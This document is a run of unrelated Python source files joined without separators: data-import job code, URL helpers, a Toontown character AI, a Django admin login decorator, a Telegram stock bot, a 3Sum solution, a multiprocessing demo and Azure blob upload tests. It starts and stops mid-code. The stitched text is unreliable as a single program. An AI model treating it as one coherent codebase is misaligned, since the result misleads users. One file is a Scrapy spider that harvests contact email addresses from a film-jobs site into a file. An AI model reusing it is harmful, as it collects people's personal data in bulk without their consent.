            pass
        else:
            record.update(tablename=tablename)
        # Store all items of this job
        for item in self.items.values():
            item.store(item_table=self.item_table)
        if record_id:
            db(jobtable.id == record_id).update(**record)
        else:
            record_id = jobtable.insert(**record)
        _debug("Job record ID=%s" % record_id)
        return record_id

    # -------------------------------------------------------------------------
    def get_tree(self):
        """
            Reconstruct the element tree of this job
        """

        if self.tree is not None:
            # Fix: return the job's tree (was an undefined name "tree",
            # raising NameError whenever a tree was present)
            return self.tree
        else:
            # Reassemble the tree from the loaded items
            xml = current.xml
            root = etree.Element(xml.TAG.root)
            for item in self.items.values():
                if item.element is not None and not item.parent:
                    if item.tablename == self.table._tablename or \
                       item.element.get(xml.UID, None) or \
                       item.element.get(xml.ATTRIBUTE.tuid, None):
                        root.append(deepcopy(item.element))
            return etree.ElementTree(root)

    # -------------------------------------------------------------------------
    def delete(self):
        """
            Delete this job and all its items from the job table
        """

        db = current.db

        _debug("Deleting job ID=%s" % self.job_id)
        self.__define_tables()
        item_table = self.item_table
        query = item_table.job_id == self.job_id
        db(query).delete()
        job_table = self.job_table
        query = job_table.job_id == self.job_id
        db(query).delete()

    # -------------------------------------------------------------------------
    def restore_references(self):
        """
            Restore the job's reference structure after loading items
            from the item table
        """

        db = current.db
        UID = current.xml.UID

        for item in self.items.values():
            # Re-link components by item ID
            for citem_id in item.load_components:
                if citem_id in self.items:
                    item.components.append(self.items[citem_id])
            item.load_components = []
            for ritem in item.load_references:
                field = ritem["field"]
                if "item_id" in ritem:
                    # Reference to another item in this job
                    item_id = ritem["item_id"]
                    if item_id in self.items:
                        _item = self.items[item_id]
                        entry = Storage(tablename=_item.tablename,
                                        element=_item.element,
                                        uid=_item.uid,
                                        id=_item.id,
                                        item_id=item_id)
                        item.references.append(Storage(field=field,
                                                       entry=entry))
                else:
                    # Reference to an existing DB record by tablename/UID
                    _id = None
                    uid = ritem.get("uid", None)
                    tablename = ritem.get("tablename", None)
                    if tablename and uid:
                        try:
                            table = current.s3db[tablename]
                        except:
                            continue
                        if UID not in table.fields:
                            continue
                        query = table[UID] == uid
                        row = db(query).select(table._id,
                                               limitby=(0, 1)).first()
                        if row:
                            _id = row[table._id.name]
                        else:
                            continue
                        entry = Storage(tablename = ritem["tablename"],
                                        element=None,
                                        uid = ritem["uid"],
                                        id = _id,
                                        item_id = None)
                        item.references.append(Storage(field=field,
                                                       entry=entry))
            item.load_references = []
            if item.load_parent is not None:
                item.parent = self.items[item.load_parent]
                item.load_parent = None

# END =========================================================================

from __future__ import absolute_import, division, print_function, unicode_literals
import string
import urllib
try:
    from urllib.parse import urlparse, urlencode, urljoin, parse_qsl, urlunparse
    from urllib.request import urlopen, Request
    from urllib.error import HTTPError
except ImportError:
    from urlparse import urlparse, urljoin, urlunparse, parse_qsl
    from urllib import urlencode
    from urllib2 import urlopen, Request, HTTPError

from random import SystemRandom

# Pool of candidate characters for random_ascii_string().
# NOTE(review): the except branch decodes byte strings to unicode — presumably
# a Python 2 fallback; confirm which interpreter takes which path.
try:
    UNICODE_ASCII_CHARACTERS = (string.ascii_letters +
        string.digits)
except AttributeError:
    UNICODE_ASCII_CHARACTERS = (string.ascii_letters.decode('ascii') +
        string.digits.decode('ascii'))


def random_ascii_string(length):
    """Return a random string of *length* ASCII letters and digits.

    Uses SystemRandom, i.e. the OS entropy source, so the result is suitable
    for tokens/nonces.
    """
    rng = SystemRandom()
    return ''.join(rng.choice(UNICODE_ASCII_CHARACTERS) for _ in range(length))


def url_query_params(url):
    """Return query parameters as a dict from the specified URL.

    Blank values are preserved (``parse_qsl`` is called with
    ``keep_blank_values=True``).

    :param url: URL.
    :type url: str
    :rtype: dict
    """
    parsed = urlparse(url)
    return dict(parse_qsl(parsed.query, True))


def url_dequery(url):
    """Return a URL with the query component removed.

    :param url: URL to dequery.
    :type url: str
    :rtype: str
    """
    parts = urlparse(url)
    stripped = (parts.scheme, parts.netloc, parts.path, parts.params, '', parts.fragment)
    return urlunparse(stripped)


def build_url(base, additional_params=None):
    """Construct a URL based off of base containing all parameters in
    the query portion of base plus any additional parameters.

    A parameter mapped to ``None`` in *additional_params* is removed from
    the final query string entirely (including any value it had in *base*).

    :param base: Base URL
    :type base: str
    :param additional_params: Additional query parameters to include.
    :type additional_params: dict
    :rtype: str
    """
    url = urlparse(base)
    query_params = dict(parse_qsl(url.query, True))
    if additional_params is not None:
        query_params.update(additional_params)
        # None is a sentinel meaning "drop this parameter"; the key is
        # guaranteed to exist because update() just inserted it.
        for key, value in additional_params.items():
            if value is None:
                del query_params[key]

    return urlunparse((url.scheme,
                       url.netloc,
                       url.path,
                       url.params,
                       urlencode(query_params),
                       url.fragment))

from otp.ai.AIBaseGlobal import *
import DistributedCCharBaseAI
from direct.directnotify import DirectNotifyGlobal
from direct.fsm import ClassicFSM, State
from direct.fsm import State
from direct.task import Task
import random
from toontown.toonbase import ToontownGlobals
from toontown.toonbase import TTLocalizer
import CharStateDatasAI

class DistributedGoofySpeedwayAI(DistributedCCharBaseAI.DistributedCCharBaseAI):
    """AI-side classic character controller for Goofy at the Speedway.

    Drives a ClassicFSM with states Off, Lonely, Chatty, Walk and
    TransitionToCostume.  State-data helper objects (CharLonelyStateAI etc.)
    signal completion through "done" events, which feed __decideNextState.
    """
    notify = DirectNotifyGlobal.directNotify.newCategory('DistributedGoofySpeedwayAI')

    def __init__(self, air):
        """Build the FSM, enter its initial state and apply holiday overrides."""
        DistributedCCharBaseAI.DistributedCCharBaseAI.__init__(self, air, TTLocalizer.Goofy)
        self.fsm = ClassicFSM.ClassicFSM('DistributedGoofySpeedwayAI', [State.State('Off', self.enterOff, self.exitOff, ['Lonely', 'TransitionToCostume', 'Walk']),
         State.State('Lonely', self.enterLonely, self.exitLonely, ['Chatty', 'Walk', 'TransitionToCostume']),
         State.State('Chatty', self.enterChatty, self.exitChatty, ['Lonely', 'Walk', 'TransitionToCostume']),
         State.State('Walk', self.enterWalk, self.exitWalk, ['Lonely', 'Chatty', 'TransitionToCostume']),
         State.State('TransitionToCostume', self.enterTransitionToCostume, self.exitTransitionToCostume, ['Off'])], 'Off', 'Off')
        self.fsm.enterInitialState()
        self.handleHolidays()

    def delete(self):
        """Tear down: finish the FSM and drop references to state data/events."""
        self.fsm.requestFinalState()
        DistributedCCharBaseAI.DistributedCCharBaseAI.delete(self)
        self.lonelyDoneEvent = None
        self.lonely = None
        self.chattyDoneEvent = None
        self.chatty = None
        self.walkDoneEvent = None
        self.walk = None
        return

    def generate(self):
        """Create the per-state data objects and their completion events."""
        DistributedCCharBaseAI.DistributedCCharBaseAI.generate(self)
        name = self.getName()
        self.lonelyDoneEvent = self.taskName(name + '-lonely-done')
        self.lonely = CharStateDatasAI.CharLonelyStateAI(self.lonelyDoneEvent, self)
        self.chattyDoneEvent = self.taskName(name + '-chatty-done')
        self.chatty = CharStateDatasAI.CharChattyStateAI(self.chattyDoneEvent, self)
        self.walkDoneEvent = self.taskName(name + '-walk-done')
        # diffPath is set by handleHolidays() when an alternate walk path applies.
        if self.diffPath == None:
            self.walk = CharStateDatasAI.CharWalkStateAI(self.walkDoneEvent, self)
        else:
            self.walk = CharStateDatasAI.CharWalkStateAI(self.walkDoneEvent, self, self.diffPath)
        return

    def walkSpeed(self):
        """Return Goofy's walk speed constant."""
        return ToontownGlobals.GoofySpeed

    def start(self):
        # Characters begin alone until avatars approach.
        self.fsm.request('Lonely')

    def __decideNextState(self, doneStatus):
        """Pick the next FSM state when a state-data object reports it is done.

        Costume-holiday transitions take priority; otherwise lonely/chatty go
        for a walk, and a finished walk becomes Chatty or Lonely depending on
        whether avatars are nearby.
        """
        if self.transitionToCostume == 1:
            curWalkNode = self.walk.getDestNode()
            if simbase.air.holidayManager:
                if ToontownGlobals.HALLOWEEN_COSTUMES in simbase.air.holidayManager.currentHolidays and simbase.air.holidayManager.currentHolidays[ToontownGlobals.HALLOWEEN_COSTUMES]:
                    simbase.air.holidayManager.currentHolidays[ToontownGlobals.HALLOWEEN_COSTUMES].triggerSwitch(curWalkNode, self)
                    self.fsm.request('TransitionToCostume')
                elif ToontownGlobals.APRIL_FOOLS_COSTUMES in simbase.air.holidayManager.currentHolidays and simbase.air.holidayManager.currentHolidays[ToontownGlobals.APRIL_FOOLS_COSTUMES]:
                    simbase.air.holidayManager.currentHolidays[ToontownGlobals.APRIL_FOOLS_COSTUMES].triggerSwitch(curWalkNode, self)
                    self.fsm.request('TransitionToCostume')
                else:
                    self.notify.warning('transitionToCostume == 1 but no costume holiday')
            else:
                self.notify.warning('transitionToCostume == 1 but no holiday Manager')
        if doneStatus['state'] == 'lonely' and doneStatus['status'] == 'done':
            self.fsm.request('Walk')
        elif doneStatus['state'] == 'chatty' and doneStatus['status'] == 'done':
            self.fsm.request('Walk')
        elif doneStatus['state'] == 'walk' and doneStatus['status'] == 'done':
            if len(self.nearbyAvatars) > 0:
                self.fsm.request('Chatty')
            else:
                self.fsm.request('Lonely')

    def enterOff(self):
        pass

    def exitOff(self):
        DistributedCCharBaseAI.DistributedCCharBaseAI.exitOff(self)

    def enterLonely(self):
        self.lonely.enter()
        # acceptOnce: the event re-arms each time the state is entered.
        self.acceptOnce(self.lonelyDoneEvent, self.__decideNextState)

    def exitLonely(self):
        self.ignore(self.lonelyDoneEvent)
        self.lonely.exit()

    def __goForAWalk(self, task):
        self.notify.debug('going for a walk')
        self.fsm.request('Walk')
        return Task.done

    def enterChatty(self):
        self.chatty.enter()
        self.acceptOnce(self.chattyDoneEvent, self.__decideNextState)

    def exitChatty(self):
        self.ignore(self.chattyDoneEvent)
        self.chatty.exit()

    def enterWalk(self):
        self.notify.debug('going for a walk')
        self.walk.enter()
        self.acceptOnce(self.walkDoneEvent, self.__decideNextState)

    def exitWalk(self):
        self.ignore(self.walkDoneEvent)
        self.walk.exit()

    def avatarEnterNextState(self):
        """First nearby avatar makes Goofy chatty, unless he is mid-walk."""
        if len(self.nearbyAvatars) == 1:
            if self.fsm.getCurrentState().getName() != 'Walk':
                self.fsm.request('Chatty')
            else:
                self.notify.debug('avatarEnterNextState: in walk state')
        else:
            self.notify.debug('avatarEnterNextState: num avatars: ' + str(len(self.nearbyAvatars)))

    def avatarExitNextState(self):
        """Last avatar leaving returns Goofy to Lonely, unless he is mid-walk."""
        if len(self.nearbyAvatars) == 0:
            if self.fsm.getCurrentState().getName() != 'Walk':
                self.fsm.request('Lonely')

    def handleHolidays(self):
        """During April Fools, switch to Donald's walk path via diffPath."""
        DistributedCCharBaseAI.DistributedCCharBaseAI.handleHolidays(self)
        if hasattr(simbase.air, 'holidayManager'):
            if ToontownGlobals.APRIL_FOOLS_COSTUMES in simbase.air.holidayManager.currentHolidays:
                if simbase.air.holidayManager.currentHolidays[ToontownGlobals.APRIL_FOOLS_COSTUMES] != None and simbase.air.holidayManager.currentHolidays[ToontownGlobals.APRIL_FOOLS_COSTUMES].getRunningState():
                    self.diffPath = TTLocalizer.Donald
        return

    def getCCLocation(self):
        # 1 = default (Goofy) location, 0 = alternate-path location.
        if self.diffPath == None:
            return 1
        else:
            return 0
        return

    def enterTransitionToCostume(self):
        pass

    def exitTransitionToCostume(self):
        pass

#!/usr/bin/python
# -*- coding: utf-8 -*-

from scrapy.spider import Spider
from scrapy.selector import Selector

from my_settings import name_file, test_mode, difference_days
from datetime import datetime, timedelta

print "Run spider NewenglandFilm"

# Output file is opened in append mode; previously collected addresses are
# read up front so duplicates across runs can be skipped.
file_output = open(name_file, 'a')
email_current_session = []
email_in_file = open(name_file, 'r').readlines()

# In test mode, pretend "today" is difference_days in the past so older
# postings still match.
if test_mode:
    current_date = (datetime.today() - timedelta(days=difference_days)).strftime('%m/%d/%Y')
else:
    current_date = datetime.today().strftime('%m/%d/%Y')

class NewenglandFilm(Spider):
    """Scrape newenglandfilm.com job listings posted today and record new contact emails."""
    name = 'newenglandfilm'
    allowed_domains = ["newenglandfilm.com"]
    start_urls = ["http://newenglandfilm.com/jobs.htm"]

    def parse(self, response):
        """Walk the first 30 listing divs; append unseen emails from today's postings to the file."""
        sel = Selector(response)
        for num_div in xrange(1, 31):
            # Posting date of the listing (m/d/Y); assumes every div has one — TODO confirm.
            date = sel.xpath('//*[@id="mainContent"]/div[{0}]/span/text()'.format(str(num_div))).re('(\d{1,2}\/\d{1,2}\/\d{4})')[0]
            email = sel.xpath('//*[@id="mainContent"]/div[{0}]/div/text()'.format(str(num_div))).re('(\w+@[a-zA-Z0-9_]+?\.[a-zA-Z]{2,6})')
            if current_date == date:
                for address in email:
                    # Skip addresses already in the file or already seen this run.
                    if address + "\n" not in email_in_file and address not in email_current_session:
                        file_output.write(address + "\n")
                        email_current_session.append(address)
                        print "Spider: NewenglandFilm. Email {0} added to file".format(address)
                    else:
                        print "Spider: NewenglandFilm. Email {0} already in the file".format(address)
import base64
try:
    from functools import wraps
except ImportError:
    from django.utils.functional import wraps  # Python 2.3, 2.4 fallback.

from django import http, template
from django.conf import settings
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login
from django.shortcuts import render_to_response
from django.utils.translation import ugettext_lazy, ugettext as _

# Lazily translated so the message is rendered in the request's language.
ERROR_MESSAGE = ugettext_lazy("Please enter a correct username and password. Note that both fields are case-sensitive.")
# Hidden form field marking a POST as coming from the login form itself.
LOGIN_FORM_KEY = 'this_is_the_login_form'

def _display_login_form(request, error_message=''):
    """Render the admin login page, setting the test cookie beforehand."""
    request.session.set_test_cookie()
    context = {
        'title': _('Log in'),
        'app_path': request.get_full_path(),
        'error_message': error_message,
    }
    return render_to_response('admin/login.html', context,
                              context_instance=template.RequestContext(request))

def staff_member_required(view_func):
    """
    Decorator for views that checks that the user is logged in and is a staff
    member, displaying the login page if necessary.
    """
    def _checklogin(request, *args, **kwargs):
        if request.user.is_authenticated() and request.user.is_staff:
            # The user is valid. Continue to the admin page.
            return view_func(request, *args, **kwargs)

        assert hasattr(request, 'session'), "The Django admin requires session middleware to be installed. Edit your MIDDLEWARE_CLASSES setting to insert 'django.contrib.sessions.middleware.SessionMiddleware'."

        # If this isn't already the login page, display it.
        if LOGIN_FORM_KEY not in request.POST:
            if request.POST:
                message = _("Please log in again, because your session has expired.")
            else:
                message = ""
            return _display_login_form(request, message)

        # Check that the user accepts cookies.
        if not request.session.test_cookie_worked():
            message = _("Looks like your browser isn't configured to accept cookies. Please enable cookies, reload this page, and try again.")
            return _display_login_form(request, message)
        else:
            request.session.delete_test_cookie()

        # Check the password.
        username = request.POST.get('username', None)
        password = request.POST.get('password', None)
        user = authenticate(username=username, password=password)
        if user is None:
            message = ERROR_MESSAGE
            # Guard against a missing 'username' field: the original did
            # `'@' in username`, which raises TypeError when username is None.
            if username and '@' in username:
                # Mistakenly entered e-mail address instead of username? Look it up.
                # NOTE(review): User.all().filter(...) is App Engine datastore
                # style, not standard Django ORM — confirm against this project.
                users = list(User.all().filter('email =', username))
                if len(users) == 1 and users[0].check_password(password):
                    message = _("Your e-mail address is not your username. Try '%s' instead.") % users[0].username
                else:
                    # Either we cannot find the user, or if more than 1
                    # we cannot guess which user is the correct one.
                    message = _("Usernames cannot contain the '@' character.")
            return _display_login_form(request, message)

        # The user data is correct; log in the user in and continue.
        else:
            if user.is_active and user.is_staff:
                login(request, user)
                return http.HttpResponseRedirect(request.get_full_path())
            else:
                return _display_login_form(request, ERROR_MESSAGE)

    return wraps(view_func)(_checklogin)

#guimporter.py
# Central import shim: keeps the PySide dependency in one module so callers
# can do `from guimporter import QtGui, Signal` instead of importing PySide directly.
import sys

from PySide import QtGui, QtCore, QtWebKit
Signal = QtCore.Signal
# -*- coding: utf-8 -*-
# @Author: karthik
# @Date:   2016-12-10 21:40:07
# @Last Modified by:   chandan
# @Last Modified time: 2016-12-11 12:55:27

from models.portfolio import Portfolio
from models.company import Company
from models.position import Position

import tenjin
from tenjin.helpers import *
import wikipedia

import matplotlib.pyplot as plt

from data_helpers import *
from stock_data import *

import BeautifulSoup as bs
import urllib2
import re

from datetime import date as dt

engine = tenjin.Engine(path=['templates'])

# info fetch handler
def send_info_handler(bot, update, args):
	"""Dispatch an info request: portfolio summary when no company is named
	(or "portfolio" is among the args), otherwise per-company details."""
	parsed = list(parse_args(args))
	wants_portfolio = not parsed or "portfolio" in [a.lower() for a in parsed]
	if wants_portfolio:
		send_portfolio_info(bot, update)
	else:
		send_companies_info(bot, update, get_companies(parsed))


# get portfolio function
def send_portfolio_info(bot, update):
	"""Render the portfolio template and send it to the requesting chat."""
	print "Userid: %d requested portfolio information" %(update.message.chat_id)
	context = {
	'positions': Portfolio.instance.positions,
    'wallet_value': Portfolio.instance.wallet_value,
	}
	html_str = engine.render('portfolio_info.pyhtml', context)
	bot.sendMessage(parse_mode="HTML", chat_id=update.message.chat_id, text=html_str)

# get companies information
def send_companies_info(bot, update, companies):
	"""For each company, send its logo, a rendered info card, and (for up to
	three companies) a combined price-history chart."""
	print "Userid: requested information for following companies %s" %','.join([c.name for c in companies])

	for company in companies:
		context = {
		'company': company,
		'current_price': get_current_price(company),
		# Wikipedia lookup keyed on the first word of the company name — may
		# mismatch for ambiguous names; TODO confirm.
		'description': wikipedia.summary(company.name.split()[0], sentences=2)
		}

		# Scrape the company logo from the Wikipedia infobox.
		wiki_page = wikipedia.page(company.name.split()[0])
		html_page = urllib2.urlopen(wiki_page.url)
		soup = bs.BeautifulSoup(html_page)
		img_url = 'http:' + soup.find('td', { "class" : "logo" }).find('img')['src']
		bot.sendPhoto(chat_id=update.message.chat_id, photo=img_url)

		html_str = engine.render('company_template.pyhtml', context)
		bot.sendMessage(parse_mode="HTML", chat_id=update.message.chat_id, text=html_str)

	# Human-readable list: "A, B and C" (or just "A").
	symbols = [c.symbol for c in companies]
	if len(symbols) >= 2:
		symbol_string = ", ".join(symbols[:-1]) + " and " + symbols[-1]
	else:
		symbol_string = symbols[0]

	last_n_days = 10

	# Chart only small groups to keep the plot legible.
	if len(companies) < 4:
		create_graph(companies, last_n_days)
		history_text = '''
			Here's the price history for {} for the last {} days
		'''.format(symbol_string, last_n_days)

		bot.sendMessage(chat_id=update.message.chat_id, text=history_text)
		bot.sendPhoto(chat_id=update.message.chat_id, photo=open("plots/temp.png",'rb'))

def create_graph(companies, timedel):
	"""Plot the last *timedel* days of prices for each company on one axes
	and save the figure to plots/temp.png.

	:param companies: iterable of company objects with a .symbol attribute
	:param timedel: number of days of history to plot
	"""
	fig, ax = plt.subplots()
	for company in companies:
		dates, lookback_prices = get_lookback_prices(company, timedel)
		# Removed unused local `h` (return value of ax.plot was never used).
		ax.plot(dates, lookback_prices, label=company.symbol)

	ax.legend()
	plt.xticks(rotation=45)
	plt.savefig('plots/temp.png')


#!/usr/bin/python
from typing import List, Optional


"""
16. 3Sum Closest

https://leetcode.com/problems/3sum-closest/
"""


def bsearch(nums, left, right, res, i, j, target):
    """Binary-search nums[left..right] for a third element whose sum with
    nums[i] and nums[j] is closest to target.

    Returns the best (closest) sum seen, carrying forward *res* as the best
    sum from earlier calls; returns early on an exact match.
    """
    pair_sum = nums[i] + nums[j]
    while left <= right:
        mid = (left + right) // 2
        total = pair_sum + nums[mid]
        if res is None or abs(total - target) < abs(res - target):
            res = total
        if total == target:
            return res
        if total > target:
            right = mid - 1
        else:
            left = mid + 1
    return res


class Solution:
    """3Sum Closest: return the triple sum closest to *target*."""

    def threeSumClosest(self, nums: List[int], target: int) -> Optional[int]:
        """For every pair, binary-search the tail for the best third element.

        Returns None when fewer than three numbers are given (no triple
        exists), matching the original behaviour.
        """
        ordered = sorted(nums)
        n = len(ordered)
        best = None
        for i in range(n):
            for j in range(i + 1, n):
                pair = ordered[i] + ordered[j]
                lo, hi = j + 1, n - 1
                # Inlined binary search (was the module-level bsearch helper).
                while lo <= hi:
                    mid = (lo + hi) // 2
                    total = pair + ordered[mid]
                    if best is None or abs(total - target) < abs(best - target):
                        best = total
                    if total == target:
                        # An exact match can never be beaten (strict < above).
                        return best
                    if total > target:
                        hi = mid - 1
                    else:
                        lo = mid + 1
        return best


def main():
    """Demo entry point: print the answer for one sample input."""
    answer = Solution().threeSumClosest([-111, -111, 3, 6, 7, 16, 17, 18, 19], 13)
    print(answer)
    return 0


if __name__ == '__main__':
    raise SystemExit(main())

from multiprocessing import Pool

import os, time, random


def long_time_task(name):
    """Worker body: sleep 0-3 s at random and report the elapsed time (Python 2 prints)."""
    print 'Run task %s (%s)...' % (name, os.getpid())
    start = time.time()
    time.sleep(random.random() * 3)
    end = time.time()
    print 'Task %s runs %0.2f seconds.' % (name, (end - start))


if __name__ == '__main__':
    print 'Parent process %s.' % os.getpid()
    # Default Pool size is os.cpu_count() workers.
    p = Pool()

    # Fan out five tasks; with a 4-worker pool the fifth waits for a free slot.
    for i in range(5):
        p.apply_async(long_time_task, args=(i,))
    print 'Waiting for all subprocesses done...'
    # close() must precede join(): no new tasks may be submitted afterwards.
    p.close()
    p.join()
    print 'All subprocesses done.'
    """
    代码解读：

    对Pool对象调用join()方法会等待所有子进程执行完毕，调用join()之前必须先调用close()，调用close()之后就不能继续添加新的Process了。

    请注意输出的结果，task 0，1，2，3是立刻执行的，而task 4要等待前面某个task完成后才执行，这是因为Pool的默认大小在我的电脑上是4，因此，最多同时执行4个进程。这是Pool有意设计的限制，并不是操作系统的限制。如果改成：

    p = Pool(5)
    """
# coding: utf-8

# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------

import pytest

from os import path, remove, sys, urandom
import platform
import uuid
from azure.storage.blob import (
    BlobServiceClient,
    ContainerClient,
    BlobClient,
    ContentSettings
)

if sys.version_info >= (3,):
    from io import BytesIO
else:
    from cStringIO import StringIO as BytesIO

from settings.testcase import BlobPreparer
from devtools_testutils.storage import StorageTestCase

# ------------------------------------------------------------------------------
TEST_BLOB_PREFIX = 'largeblob'
LARGE_BLOB_SIZE = 12 * 1024 * 1024
LARGE_BLOCK_SIZE = 6 * 1024 * 1024

# ------------------------------------------------------------------------------
if platform.python_implementation() == 'PyPy':
    pytest.skip("Skip tests for Pypy", allow_module_level=True)

class StorageLargeBlockBlobTest(StorageTestCase):
    """Live tests exercising large block-blob uploads (block staging and chunked upload)."""

    def _setup(self, storage_account_name, key):
        """Create a BlobServiceClient with small size thresholds and ensure the test container exists."""
        # test chunking functionality by reducing the threshold
        # for chunking and the size of each chunk, otherwise
        # the tests would take too long to execute
        self.bsc = BlobServiceClient(
            self.account_url(storage_account_name, "blob"),
            credential=key,
            max_single_put_size=32 * 1024,
            max_block_size=2 * 1024 * 1024,
            min_large_block_upload_threshold=1 * 1024 * 1024)
        self.config = self.bsc._config
        self.container_name = self.get_resource_name('utcontainer')

        if self.is_live:
            try:
                self.bsc.create_container(self.container_name)
            except:
                # Best effort: the container may already exist from a prior run.
                pass

    def _teardown(self, file_name):
        """Best-effort removal of the temporary local file used by a test."""
        if path.isfile(file_name):
            try:
                remove(file_name)
            except:
                pass

    # --Helpers-----------------------------------------------------------------
    def _get_blob_reference(self):
        """Return a unique blob name with the shared test prefix."""
        return self.get_resource_name(TEST_BLOB_PREFIX)

    def _create_blob(self):
        """Create an empty blob and return its client."""
        blob_name = self._get_blob_reference()
        blob = self.bsc.get_blob_client(self.container_name, blob_name)
        blob.upload_blob(b'')
        return blob

    def assertBlobEqual(self, container_name, blob_name, expected_data):
        """Download the blob and assert its full content equals *expected_data*."""
        blob = self.bsc.get_blob_client(container_name, blob_name)
        actual_data = blob.download_blob()
        self.assertEqual(b"".join(list(actual_data.chunks())), expected_data)

    # --Test cases for block blobs --------------------------------------------
    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_put_block_bytes_large(self, storage_account_name, storage_account_key):
        """Stage five large blocks from raw bytes and check each response dict."""
        self._setup(storage_account_name, storage_account_key)
        blob = self._create_blob()

        # Act
        for i in range(5):
            resp = blob.stage_block(
                'block {0}'.format(i).encode('utf-8'), urandom(LARGE_BLOCK_SIZE))
            self.assertIsNotNone(resp)
            assert 'content_md5' in resp
            assert 'content_crc64' in resp
            assert 'request_id' in resp

            # Assert

    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_put_block_bytes_large_with_md5(self, storage_account_name, storage_account_key):
        """Stage five large blocks from bytes with MD5 validation enabled."""
        self._setup(storage_account_name, storage_account_key)
        blob = self._create_blob()

        # Act
        for i in range(5):
            resp = blob.stage_block(
                'block {0}'.format(i).encode('utf-8'),
                urandom(LARGE_BLOCK_SIZE),
                validate_content=True)
            self.assertIsNotNone(resp)
            assert 'content_md5' in resp
            assert 'content_crc64' in resp
            assert 'request_id' in resp

    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_put_block_stream_large(self, storage_account_name, storage_account_key):
        """Stage five large blocks from streams and check each response dict."""
        self._setup(storage_account_name, storage_account_key)
        blob = self._create_blob()

        # Act
        for i in range(5):
            stream = BytesIO(bytearray(LARGE_BLOCK_SIZE))
            # Fixed: was `resp = resp = blob.stage_block(...)` (duplicated assignment target).
            resp = blob.stage_block(
                'block {0}'.format(i).encode('utf-8'),
                stream,
                length=LARGE_BLOCK_SIZE)
            self.assertIsNotNone(resp)
            assert 'content_md5' in resp
            assert 'content_crc64' in resp
            assert 'request_id' in resp

            # Assert

    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_put_block_stream_large_with_md5(self, storage_account_name, storage_account_key):
        """Stage five large blocks from streams with MD5 validation enabled."""
        self._setup(storage_account_name, storage_account_key)
        blob = self._create_blob()

        # Act
        for i in range(5):
            stream = BytesIO(bytearray(LARGE_BLOCK_SIZE))
            # Fixed: was `resp = resp = blob.stage_block(...)` (duplicated assignment target).
            resp = blob.stage_block(
                'block {0}'.format(i).encode('utf-8'),
                stream,
                length=LARGE_BLOCK_SIZE,
                validate_content=True)
            self.assertIsNotNone(resp)
            assert 'content_md5' in resp
            assert 'content_crc64' in resp
            assert 'request_id' in resp

        # Assert

    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_create_large_blob_from_path(self, storage_account_name, storage_account_key):
        """Upload a 12 MB blob from a local file with two parallel connections."""
        # parallel tests introduce random order of requests, can only run live

        self._setup(storage_account_name, storage_account_key)
        blob_name = self._get_blob_reference()
        blob = self.bsc.get_blob_client(self.container_name, blob_name)
        data = bytearray(urandom(LARGE_BLOB_SIZE))
        FILE_PATH = 'large_blob_from_path.temp.{}.dat'.format(str(uuid.uuid4()))
        with open(FILE_PATH, 'wb') as stream:
            stream.write(data)

        # Act
        with open(FILE_PATH, 'rb') as stream:
            blob.upload_blob(stream, max_concurrency=2, overwrite=True)

        block_list = blob.get_block_list()

        # Assert
        self.assertIsNot(len(block_list), 0)
        self.assertBlobEqual(self.container_name, blob_name, data)
        self._teardown(FILE_PATH)

    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_create_large_blob_from_path_with_md5(self, storage_account_name, storage_account_key):
        """Upload a large blob from a file with content validation enabled."""
        # parallel tests introduce random order of requests, can only run live

        self._setup(storage_account_name, storage_account_key)
        blob_name = self._get_blob_reference()
        blob = self.bsc.get_blob_client(self.container_name, blob_name)
        data = bytearray(urandom(LARGE_BLOB_SIZE))
        FILE_PATH = "blob_from_path_with_md5.temp.dat"
        with open(FILE_PATH, 'wb') as stream:
            stream.write(data)

        # Act
        with open(FILE_PATH, 'rb') as stream:
            blob.upload_blob(stream, validate_content=True, max_concurrency=2)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data)
        self._teardown(FILE_PATH)

    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_create_large_blob_from_path_non_parallel(self, storage_account_name, storage_account_key):
        """Upload a small (100-byte) blob from a file with a single connection."""
        self._setup(storage_account_name, storage_account_key)
        blob_name = self._get_blob_reference()
        blob = self.bsc.get_blob_client(self.container_name, blob_name)
        data = bytearray(self.get_random_bytes(100))
        FILE_PATH = "blob_from_path_non_parallel.temp.dat"
        with open(FILE_PATH, 'wb') as stream:
            stream.write(data)

        # Act
        with open(FILE_PATH, 'rb') as stream:
            blob.upload_blob(stream, max_concurrency=1)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data)
        self._teardown(FILE_PATH)

    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_create_large_blob_from_path_with_progress(self, storage_account_name, storage_account_key):
        """Upload a large blob from a file and verify progress callbacks fire."""
        # parallel tests introduce random order of requests, can only run live

        self._setup(storage_account_name, storage_account_key)
        blob_name = self._get_blob_reference()
        blob = self.bsc.get_blob_client(self.container_name, blob_name)
        data = bytearray(urandom(LARGE_BLOB_SIZE))
        FILE_PATH = "blob_from_path_with_progress.temp.dat"
        with open(FILE_PATH, 'wb') as stream:
            stream.write(data)

        # Act
        progress = []
        def callback(response):
            # Record (bytes-uploaded-so-far, total) pairs from the pipeline hook.
            current = response.context['upload_stream_current']
            total = response.context['data_stream_total']
            if current is not None:
                progress.append((current, total))

        with open(FILE_PATH, 'rb') as stream:
            blob.upload_blob(stream, max_concurrency=2, raw_response_hook=callback)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data)
        self.assert_upload_progress(len(data), self.config.max_block_size, progress)
        self._teardown(FILE_PATH)

    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_create_large_blob_from_path_with_properties(self, storage_account_name, storage_account_key):
        """Upload a large blob with content settings and verify they round-trip."""
        # parallel tests introduce random order of requests, can only run live

        self._setup(storage_account_name, storage_account_key)
        blob_name = self._get_blob_reference()
        blob = self.bsc.get_blob_client(self.container_name, blob_name)
        data = bytearray(urandom(LARGE_BLOB_SIZE))
        FILE_PATH = 'blob_from_path_with_properties.temp.{}.dat'.format(str(uuid.uuid4()))
        with open(FILE_PATH, 'wb') as stream:
            stream.write(data)

        # Act
        content_settings = ContentSettings(
            content_type='image/png',
            content_language='spanish')
